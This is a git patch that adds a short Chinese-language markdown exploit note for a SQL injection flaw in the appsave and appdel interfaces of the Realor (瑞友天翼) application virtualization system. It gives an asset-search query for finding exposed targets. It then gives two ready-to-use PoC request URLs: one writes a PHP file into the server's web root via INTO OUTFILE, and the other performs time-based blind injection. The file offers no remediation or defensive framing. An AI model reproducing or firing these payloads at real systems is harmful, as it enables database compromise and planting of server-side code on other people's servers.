From d643993b07f38e72f56262c0a2d75c39e1fb8a0a Mon Sep 17 00:00:00 2001 From: wy876 <139549762+wy876@users.noreply.github.com> Date: Wed, 8 May 2024 20:37:46 +0800 Subject: [PATCH] =?UTF-8?q?Create=20=E7=91=9E=E5=8F=8B=E5=A4=A9=E7=BF=BC?= =?UTF-8?q?=E5=BA=94=E7=94=A8=E8=99=9A=E6=8B=9F=E5=8C=96=E7=B3=BB=E7=BB=9F?= =?UTF-8?q?appsave=E6=8E=A5=E5=8F=A3=E5=AD=98=E5=9C=A8SQL=E6=B3=A8?= =?UTF-8?q?=E5=85=A5=E6=BC=8F=E6=B4=9E.md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...天翼应用虚拟化系统appsave接口存在SQL注入漏洞.md | 16 ++++++++++++++++ 1 file changed, 16 insertions(+) create mode 100644 瑞友天翼应用虚拟化系统appsave接口存在SQL注入漏洞.md diff --git a/瑞友天翼应用虚拟化系统appsave接口存在SQL注入漏洞.md b/瑞友天翼应用虚拟化系统appsave接口存在SQL注入漏洞.md new file mode 100644 index 0000000..4d8bf9a --- /dev/null +++ b/瑞友天翼应用虚拟化系统appsave接口存在SQL注入漏洞.md @@ -0,0 +1,16 @@ +## 瑞友天翼应用虚拟化系统appsave接口存在SQL注入漏洞 + +## hunter +``` +app.name="REALOR 瑞友天翼虚拟化平台" +``` + +## poc +``` +http://xx.xx.xx.xx/hmrao.php?s=/Admin/appsave&appid=1%27);select%200x3c3f70687020706870696e666f28293b3f3e%20into%20outfile%20%27C:\Program%20Files%20(x86)\RealFriend\Rap%20Server\WebRoot\123.php%27%20--+ + +http://xx.xx.xx.xx/hmrao.php?s=/Admin/appdel&list=1111111%27%29%29%20AND%20%28SELECT%206312%20FROM%20%28SELECT%28SLEEP%285%29%29%29coHe%29%23 +``` + +## 漏洞来源 +- https://mp.weixin.qq.com/s/-TliLqPaokAqcE_qj5OPVQ